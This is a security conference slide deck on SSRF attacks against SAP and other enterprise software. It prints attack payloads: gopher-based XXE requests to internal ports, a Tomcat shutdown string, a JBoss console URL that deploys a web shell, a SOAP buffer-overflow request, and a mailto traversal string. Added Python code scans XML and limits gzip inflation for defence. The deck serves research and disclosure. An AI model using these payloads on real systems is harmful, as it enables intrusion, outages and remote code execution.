Invest in security to secure investments
SSRF VS. BUSINESS-CRITICAL APPLICATIONS PART 2: NEW VECTORS AND CONNECT-BACK ATTACKS
Alexander Polyakov – CTO at ERPScan
About ERPScan
• The only 360-degree SAP security solution: ERPScan Security Monitoring Suite for SAP
• Leader by the number of acknowledgements from SAP (150+)
• 60+ presentations at key security conferences worldwide
• 25 awards and nominations
• Research team: 20 experts with experience in different areas of security
• Headquarters in Palo Alto (US) and Amsterdam (EU)
Agenda
• Enterprise applications
• SSRF
– History
– Types
• SSRF proxy attacks
– Example of attacking SAP with SSRF
• SSRF connect-back attacks
– Examples
• XXE Scanner
• Conclusion
Enterprise applications: Definitions
Business software is generally any software that helps a business increase its efficiency or measure its performance.
• Small (MS Office)
• Medium (CRM, shops)
• Enterprise (ERP, BW…)
Why are they critical?
• Any information an attacker might want, be it a cybercriminal, industrial spy or competitor, is stored in corporate ERP. This information can include financial, customer or public relations, intellectual property, personally identifiable information and more. Industrial espionage, sabotage, and fraud or insider embezzlement may be very effective if targeted at the victim's ERP system, and they can cause significant damage to the business.
Business-critical systems architecture
• Located in a secure subnetwork
• Secured by firewalls
• Monitored by IDS systems
• Regularly patched
SSRF History: the beginning
• SSRF: Server Side Request Forgery.
• An attack which was discussed in 2008 with very little information about theory and practical examples.
• Like any new term, SSRF doesn't show us something completely new like a new type of vulnerability. SSRF-style attacks were known before.
SSRF History: Basics
• We send Packet A to Service A
• Service A initiates Packet B to Service B
• Services can be on the same host or on different hosts
• We can manipulate some fields of Packet B within Packet A
• Various SSRF attacks depend on how many fields we can control in Packet B
(Diagram: Packet A → Service A, Packet B → Service B)
SSRF history
• Deral Heiland – Shmoocon 2008 – Web Portals: Gateway To Information Or A Hole In Our Perimeter Defenses
• SpiderLabs 2012 – http://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.html
• Vorontsov 2012 – SSRF via XXE – http://2012.caro.org/presentations/attacks-on-large-modern-web-applications
• ERPScan (Polyakov, Chastuchin) – SSRF vs business critical applications (Gopher protocol), August 2012 – http://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdf
SSRF history
• ssrfsocks by iamultra: a tool for ERPScan's vulnerability in Gopher – https://github.com/iamultra/ssrfsocks, August 2012
• Less Known Web App Vulnerabilities: Real World Examples (from ERPScan paper), October 2012
• ERPScan – Gopher SSRF in JVM advisory, October 2012 – http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/
• ERPScan (Polyakov) – SSRF 2.0 – http://erpscan.com/category/publications/
• New research will be published at ZeroNights – http://2012.zeronights.org/
Ideal SSRF
The idea is to find victim server interfaces that will allow sending packets initiated by the victim server to the localhost interface of the victim server or to another server secured by a firewall from outside. Ideally, this interface:
• Must allow sending any packet to any host and any port
• Must be accessible remotely without authentication
Why?
In this research, we wanted to:
• Collect information about SSRF attacks
• Categorize them
• Show examples of SSRF attacks
• Show new potential and real SSRF vectors
SSRF (classification)
• SSRF proxy attacks
– Trusted SSRF
– Remote SSRF: Simple, Partial, Full
• SSRF back connect
– Local SSRF
– SSRF counter attack
SSRF proxy attacks
• Trusted SSRF (can forge requests to remote services, but only to predefined ones)
• Remote SSRF (can forge requests to any remote IP and port)
– Simple Remote SSRF (no control on app level)
– Partial Remote SSRF (control in some fields of app level)
– Full Remote SSRF (control on app level)
Exploiting SSRF
For every SSRF attack, there must be at least 2 vulnerabilities to successfully trigger the attack:
• First vulnerability
– Functionality to create/use links (for trusted SSRF)
– Functionality in some service on Server A which allows us to send remote packets (for other types of SSRF)
• Second vulnerability
– Insecure link (for trusted SSRF)
– Vuln. in service on Server B (for remote SSRF)
– Vuln. in localhost service on Server A (for local SSRF)
– Vuln. in client app. on Server A (for back-connect SSRF)
Trusted SSRF
• Trusted SSRF in Oracle
– SELECT * FROM myTable@HostB
– EXECUTE Schema.Package.Procedure('Parameter')@HostB
• Trusted SSRF in MSSQL
– SELECT * FROM openquery(HostB, 'select @@version')
• Trusted SSRF in SAP NetWeaver
– SM59 transaction
• Also Lotus Domino and others
Not so interesting…
First vulnerability (functionality on Server A)
• Unusual calls
• Multiprotocol calls (URI)
– In engines (XML)
– In applications
• UNC calls
• HTTP calls
• FTP calls
• LDAP calls
• SSH calls
• Other calls
Functionality on Server A: Unusual calls
• Remote port scan
– SAP NetWeaver wsnavigator (SAP Note 1394544, 871394)
– SAP NetWeaver ipcpricing (SAP Note 1545883)
– SAP BusinessObjects viewrpt (SAP Note 1583610)
• Remote password bruteforce
– SAP NetWeaver (NDA)
• Other
– Information disclosure by testing if a file or a directory exists
– Timing attacks
– Etc.
Very application-specific. Can be very interesting.
Example of unusual calls
• It is possible to scan the internal network from the Internet
• Authentication is not required
• SAP NetWeaver J2EE engine is vulnerable
/ipcpricing/ui/BufferOverview.jsp?server=172.16.0.13&port=31337&dispatcher=&targetClient=&view=
Multiprotocol calls (in XML)
• XML seems to be the new TCP.
• Almost all big projects use XML-based data transfer.
• There are a lot of XML-based protocols with different options to call external resources and thus conduct SSRF attacks.
• There is at least one element type which fits almost all XML-based schemes. The type is: xsd:anyURI.
• URIs also encompass URLs of other schemes (e.g., FTP, gopher, telnet), as well as URNs.
• Popular URIs: http:// ftp:// telnet:// …
Multiprotocol calls in XML
• XML
– XML External Entity
– XSD definition
• XML Encryption
• XML Signature
• WS-Policy
• From WS-Security
• WS-Addressing
XML Encryption
1. <xenc:AgreementMethod Algorithm="http://ServerB/">
2. <xenc:EncryptionProperty Target="http://ServerB/">
3. <xenc:CipherReference URI="http://ServerB/">
4. <xenc:DataReference URI="http://ServerB/">
Successfully tested
WS-Addressing
1. <To xmlns="http://www.w3.org/2005/08/addressing">http://ServerB/</To>
2. <ReplyTo xmlns="http://www.w3.org/2005/08/addressing"><Address>http://ServerB/</Address></ReplyTo>
Successfully tested (0-day)
WS-Security
1. <input message="blabla" wsa:Action="http://ServerB"/>
2. <output message="blabla" wsa:Action="http://ServerB"/>
Not tested
WS-Federation
1. <fed:Federation FederationID="http://ServerB/">
2. <fed:FederationInclude>http://ServerB/</fed:FederationInclude>
3. <fed:TokenIssuerName>http://ServerB/</fed:TokenIssuerName>
4. <mex:MetadataReference><wsa:Address>http://ServerB/</wsa:Address></mex:MetadataReference>
Not tested
XBRL
1. <xbrli:identifier scheme="http://ServerB/">
2. <link:roleType roleURI="http://ServerB/">
Not tested
ODATA (edmx)
The edmx:Reference element specifies external entity models referenced by this EDMX. Referenced models are available in their entirety to referencing models. All entity types, complex types and other named elements in a referenced model can be accessed from a referencing model.
http://www.odata.org/media/30002/OData%20CSDL%20Definition.html
No examples of edmx in the wild (new protocol)
ODATA
1. <edmx:Reference URI="http://ServerB/attack">
2. <edmx:AnnotationsReference URI="http://ServerB/attack">
Still no products for testing (0-day)
UNC calls: threats
• Sure, you can call a UNC path if you have a universal URI
• But if there is no universal engine, you can search for UNC
• UNC calls can be used for:
– conducting an SMBRelay attack
– reading files from shared folders (open or trusted)
– other vectors which will be discussed later
Check the SMBRelay Bible posts at http://erpscan.com/?s=SMBRelay+Bible&x=0&y=0
UNC calls: applications
• SAP NetWeaver
– From SAP web services (SAP Note 1503579, 1498575)
– From RFC functions (SAP Note 1554030)
– From SAP transactions, reports (SAP Note 1583286)
• Oracle Database
– Listener
– Database commands such as ctxsys.context
And much more
UNC calls: applications
• MsSQL Database
• MySQL Database
• FTP servers
• IBM Lotus Domino controller
• VMWare
• Anything that uses an XML engine
And much more
HTTP calls: threats
• Sure, you can call an HTTP path if you have a universal URI
• But if there is no universal engine, you can search for HTTP
• HTTP calls can be used for conducting a wide range of attacks on systems which are in one network with Server A
– DoS
– Information disclosure
– Unauthorized access (like invoker servlets)
– Bruteforcing (users/directories/pages)
– Fingerprinting
– etc.
Examples of HTTP attacks are beyond the current research
HTTP calls: applications
• SAP NetWeaver
– Transactions
– Reports
– RFC commands
– Portal portlets
– Portal links
• Oracle Database
– UTL_HTTP
• MsSQL Database
• PostgreSQL Database
• Anything that uses an XML engine
And much more
FTP calls: threats
• Sure, you can call an FTP path if you have a universal URI
• FTP is usually possible whenever HTTP is possible
• But if there is no universal engine, you can search for FTP
• FTP calls can be used to conduct a wide range of attacks on systems which are in one network with Server A
– DoS
– Information disclosure
– Unauthorized access (like invoker servlets)
– Bruteforcing (users/directories/pages)
– Fingerprinting
– etc.
Examples of FTP attacks are beyond the current research
FTP calls: applications
• SAP NetWeaver
– Transactions
– Reports
– RFC commands
• Oracle Database
– UTL_HTTP
• PostgreSQL Database
• Anything that uses an XML engine
And much more
Other calls
• ldap://
– Bruteforce logins
– Information disclosure
• jar://
– Information disclosure
• mailto:
• ssh2://
– Bruteforce logins
– RCE?
• gopher://
– XXE Tunneling
• …
Just the most popular ones
Exploiting Gopher (Example)
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY date SYSTEM "gopher://172.16.0.1:3300/AAAAAAAAA" >]>
<foo>&date;</foo>
What will happen??
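As an added defender-side example (not code from the talk or from ERPScan): a Python pre-parse gate that lists every outbound reference an incoming XML document would make a server issue, covering both the DOCTYPE entity in the gopher example above and the URI-typed elements of the XML standards listed earlier (xenc, WS-Addressing, edmx). The allowed-scheme set, the host allowlist and the sample documents are constructed assumptions.

```python
import re
import ipaddress
from urllib.parse import urlsplit

# Constructed pre-parse gate: run on the raw XML before it reaches an engine that
# resolves external entities or URI-typed (xsd:anyURI) elements, it lists every
# outbound reference the document would make the server issue on its own behalf.
ALLOWED_SCHEMES = {"http", "https"}           # assumed policy: nothing else is fetched

# <!ENTITY name SYSTEM "uri"> or <!ENTITY name PUBLIC "id" "uri"> in the DOCTYPE
ENTITY_RE = re.compile(
    r'<!ENTITY\s+(?:%\s+)?(\S+)\s+(?:SYSTEM\s+|PUBLIC\s+["\'][^"\']*["\']\s+)'
    r'["\']([^"\']+)["\']', re.IGNORECASE)
# scheme://... in attribute values or element text, plus \\host\share UNC paths
URI_RE = re.compile(r'[A-Za-z][A-Za-z0-9+.-]*://[^\s"\'<>]+|\\\\[^\s"\'<>]+')
# namespace declarations are identifiers, never fetched: drop them before scanning
XMLNS_RE = re.compile(r'\sxmlns(?::[\w.-]+)?\s*=\s*(?:"[^"]*"|\'[^\']*\')')


def classify_uri(uri, allowed_hosts):
    """Reason this URI must not be fetched for the caller, or None if it is allowed."""
    if uri.startswith("\\\\"):
        return "UNC path (SMB relay / share access)"
    parts = urlsplit(uri)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:          # gopher, ftp, ldap, jar, ssh2, ...
        return f"scheme {scheme!r} not allowed"
    host = (parts.hostname or "").lower()
    try:
        if not ipaddress.ip_address(host).is_global:   # loopback, RFC1918, link-local
            return f"internal address {host}"
    except ValueError:
        pass                                   # a DNS name: the allowlist decides
    if host not in allowed_hosts:
        return f"host {host!r} not allowlisted"
    return None


def scan_xml(doc, allowed_hosts=frozenset()):
    """Return (where, uri, reason) for each reference the document would trigger."""
    findings, seen = [], set()
    for name, uri in ENTITY_RE.findall(doc):
        # an external entity is always reported: a resolving engine would fetch it
        reason = classify_uri(uri, allowed_hosts) or "external entity"
        findings.append((f"entity {name}", uri, reason))
        seen.add(uri)
    for uri in URI_RE.findall(XMLNS_RE.sub("", doc)):
        reason = classify_uri(uri, allowed_hosts)
        if reason and uri not in seen:
            findings.append(("body", uri, reason))
    return findings


# Constructed samples: the gopher XXE body from the talk, a WS-Addressing ReplyTo,
# and a benign message whose only outbound reference goes to an allowlisted host.
XXE_GOPHER = ('<?xml version="1.0" encoding="ISO-8859-1"?>'
              '<!DOCTYPE foo [ <!ELEMENT foo ANY >'
              '<!ENTITY date SYSTEM "gopher://172.16.0.1:3300/AAAAAAAAA" >]>'
              '<foo>&date;</foo>')
WSA_REPLYTO = ('<ReplyTo xmlns="http://www.w3.org/2005/08/addressing">'
               '<Address>http://ServerB/</Address></ReplyTo>')
BENIGN = ('<ReplyTo xmlns="http://www.w3.org/2005/08/addressing">'
          '<Address>https://callback.example.com/wsa</Address></ReplyTo>')
```

Running `scan_xml` on the three samples flags the gopher entity and the non-allowlisted ServerB address and passes the benign message; the gate is a complement to, not a replacement for, disabling external entity resolution in the engine itself.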
XXE Tunneling (Example)
(Diagram) Request → Server A (Portal or XI, 192.168.0.1) → Server B (ERP, HR, BW etc., 172.16.0.1), port 3300
Packet A, sent to Server A:
POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1
Host: 192.168.0.1:8000
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY date SYSTEM "gopher://172.16.0.1:3300/AAAAAAAAA" >]>
<foo>&date;</foo>
Packet B, as received by Server B on port 3300 (equivalent to telnet 172.16.0.1 3300 from Server A): AAAAAAAAAAAAA
XXE Tunneling to Buffer Overflow (Example)
• A buffer overflow vulnerability found by Virtual Forge in the ABAP Kernel (fixed in SAP Note 1487330)
• Hard to exploit because it requires calling an RFC function which calls a Kernel function
• But even such a complex attack can be exploited
• Get ready for the hardcore
XXE Tunneling to Buffer Overflow (Hint 1)
• Shellcode size is limited to 255 bytes (name parameter)
• As we don't have a direct connection to the Internet from the vulnerable system, we want to use DNS tunneling shellcode to connect back
• But the XML engine saves some XML data in RWX memory
• So we can use an egghunter
• Any shellcode can be uploaded
XXE Tunneling to Buffer Overflow: Packet B
POST /sap/bc/soap/rfc?sap-client=000 HTTP/1.1
Authorization: Basic U1FQKjowMjA3NTk3==
Host: company.com:80
User-Agent: ERPSCAN Pentesting tool v 0.2
Content-Type: text/xml; charset=utf-8
Cookie: sap-client=000
Content-Length: 2271

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SOAP-ENV:Body>
<m:RSPO_R_SAPGPARAM xmlns:m="urn:sap-com:document:sap:rfc:functions">
<HEAP_EGG>dsecdsec[binary payload omitted]</HEAP_EGG>
<NAME>[binary payload and padding omitted]</NAME>
</m:RSPO_R_SAPGPARAM>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
XXE Tunneling to Buffer Overflow (Hint 2)
• Next step is to pack this Packet B into Packet A
• We need to insert non-printable symbols
• God bless gopher; it supports urlencode like HTTP
• It will also help evade detection by IDS systems
Packet A:
POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1
Host: sapserver.com:80
Content-Length: 7730

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY date SYSTEM "gopher://[Urlencoded Packet B]" >]>
<foo>&date;</foo>
XXE Tunneling to Buffer Overflow (Result)
(Diagram) Server A on the Internet (SAP XI, http://company.com) → Server B in DMZ (SAP ERP, 172.16.0.1), port 8000 WebRFC service
Packet A, sent to Server A:
POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1
Host: sapserver.com:80
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY date SYSTEM "gopher://[packetB]" >]>
<foo>&date;</foo>
Packet B: delivered by Server A to the WebRFC service on Server B, port 8000; it carries the shellcode with the DNS payload
Packet C: command-and-control response to the attacker by DNS protocol, which is allowed for outbound connections
So, you can only send one packet by gopher but you can't control the session… Hmm, actually, sometimes you can.
Session handling by SSRF (trick 1)
• Using Gopher, it is possible to send multiple packets in one session. Just add them like this:
– gopher://[packet1][packet2][packet3]…
– But you must know the session ID or use a protocol without a session ID, like telnet
Successfully tested for SAP Message Server parameter change
Session handling by SSRF (trick 2)
• Just theoretical
• Let's suppose that the session is handled by the IP and port of the client
• The first packet is sent from some random port, for example, 3000
• Collect info about the session from the response
• Construct the second packet (next time, the source port will be 3001, 3002… etc.)
• Send the second packet until the source port is 3000 again
Needs testing
SSRF back connect attack
• Local SSRF: the idea is to initiate a connection to localhost services on Server A
• Counter-attack: the idea of this attack is to send Packet A to Server A. The service must take Packet B and send it to the attacker's Server C. Server C will make a malformed response to Server A and trigger a client-side vulnerability in the application.
Local SSRF
• The first example is local SSRF
• We try to attack localhost ports on the same server with SSRF
• There are a lot of ports listened on by the OS and applications at localhost, and usually they are less secure
Currently working on a database of the most interesting ports
Local SSRF to Tomcat shutdown
• Tomcat management port 8005
• Open only for localhost
• gopher://localhost:8005/SHUTDOWN%0d%0a
Successfully exploitable (thanks to Alexey Sintsov)
Local SSRF to Oracle Listener
• Problem
– An old vulnerability in the Oracle listener in Set_log_file
– Secured by LOCAL_OS_AUTHENTICATION in 10G
• Attack
– A user with CONNECT privileges can run UTL_TCP functions
– Using UTL_TCP, it is possible to construct any TCP packet and send it to the listener
– The connection will be from a local IP, so we bypass the LOCAL_OS_AUTHENTICATION restrictions
Tested in early 2008
Local SSRF to JBoss console
• JBoss management console service
• Even with a simple HTTP request
• Open only for localhost
http://localhost:8080/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=shell.war&argType=java.lang.String&arg1=shell&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=[urlencoded JSP payload omitted]&argType=boolean&arg4=True
Thanks to Alexey Sintsov for the sploit
Bypass SAP security restrictions
• It is possible to bypass many SAP security restrictions based on ACLs
– SAP Gateway
– SAP Message Server
– Other remote services
gopher://172.16.0.1:3301/[urlencoded Gateway packet omitted]
Gateway example
Counter-attack SSRF
• This is the most interesting way to use SSRF, which was not discussed before.
• We send a command from Server A to our Server C using SSRF, and then we generate a response which will trigger a vulnerability in an application on Server A.
• Some interesting attacks are also possible.
New life for client-side bugz
Counter-attack on SMB client
• DoS by reading huge files remotely
• SMBRelay
• RCE vulnerabilities in the SMB client
– MS10-006
– MS10-020
– MS11-019
– MS11-043
Looking for a working example of a client-side bug
Counter-attack on FTP client
• Memory corruption vulnerabilities in FTP clients
– Some examples: https://www.corelan.be/index.php/2010/10/12/death-of-an-ftp-client/
• Client path traversal
– Those types of vulnerabilities are rare nowadays, but there are some chances to find them in industrial systems because they were created a long time ago.
Working on real examples
Counter-attack on HTTP client
The most widespread type of SSRF request is HTTP. It means that vulnerabilities in embedded HTTP clients (which are used by different XML engines, for example) are the most sought-after part of our future research.
– DoS by multiple entities with links to big data
– DoS by multiple GZIP bombs
Working on real examples
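An added example for the GZIP-bomb case above (my code, not the talk's or ERPScan's): a bounded gzip inflater of the kind an embedded HTTP client needs when it fetches a response on a server's behalf, next to the naive one-shot version, with a constructed bomb body to exercise both. The 1 MiB cap is an assumed policy value.

```python
import gzip
import io
import zlib

# Constructed example: how an embedded HTTP client that fetches resources for a
# server should handle a gzip-encoded body. A tiny hostile response may inflate
# to gigabytes; inflating in bounded steps against an output cap stops that,
# while a one-shot gunzip does not. The cap is an assumed policy value.
MAX_BODY = 1 << 20                      # 1 MiB of decompressed body for a schema/entity


class BodyTooLarge(Exception):
    """Raised when a response would inflate past the configured cap."""


def make_gzip_bomb(decompressed_size=16 << 20):
    """Constructed hostile body: highly repetitive data gzips roughly 1000:1."""
    buf = io.BytesIO()
    with gzip.GzipFile(fileobj=buf, mode="wb") as gz:
        chunk = b"\0" * (1 << 16)
        for _ in range(decompressed_size // len(chunk)):
            gz.write(chunk)
    return buf.getvalue()


def unsafe_gunzip(body):
    """What a naive client does: inflate everything; available memory is the limit."""
    return gzip.decompress(body)


def safe_gunzip(body, max_out=MAX_BODY):
    """Inflate incrementally and abort as soon as the output would exceed max_out."""
    inflater = zlib.decompressobj(16 + zlib.MAX_WBITS)   # +16: expect gzip framing
    out = bytearray()
    data = body
    while data:
        # ask for at most one byte more than still allowed, so an overrun is visible
        out += inflater.decompress(data, max_out + 1 - len(out))
        if len(out) > max_out:
            raise BodyTooLarge(f"decompressed body exceeds {max_out} bytes")
        data = inflater.unconsumed_tail    # input held back because of the cap
    out += inflater.flush()                # at most a partial match remains here
    if len(out) > max_out:
        raise BodyTooLarge(f"decompressed body exceeds {max_out} bytes")
    return bytes(out)


def inflates_within_limit(body, max_out=MAX_BODY):
    """True if the body inflates under the cap, False if it was rejected."""
    try:
        safe_gunzip(body, max_out)
        return True
    except BodyTooLarge:
        return False
```

The same bound applies to the other DoS item on the slide: a client that follows entity links to large bodies needs a byte cap on the raw response as well, not only on the inflated one.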
Counter-attack on JAR parser
XML engines support the jar: scheme. Calling some URL using this scheme, the JAR parser opens a remote archive and takes a file from it. If there is a file parsing vulnerability in the JAR parser, it will be possible to attack the server.
• Directory traversal
– Tested: JDK jar parser – not vulnerable
• Jar bombs
Working on real examples
Counter-attack on mailto: parser
• mailto:%00%00..\..\..\..\..\..\..\..\\..\\..\\..\\..\\..\\..//..//..//..//..//../../../../../../windows/system32/aaaa.exe
• Successfully read the file
• There should be an RCE but….
Found yesterday :)
Conclusion 2
• SSRF attacks are very dangerous
• They have a very wide range, which is still poorly covered
• The Gopher example is not the only one, I suppose
• It is still a big research area
• A lot of technologies and applications can be used for SSRF
• I only check those places where I am working a lot
• But there are still many uncovered areas
• OWASP-EAS SSRF wiki
• Let's make the biggest database of SSRFs
• Mail me if you have any ideas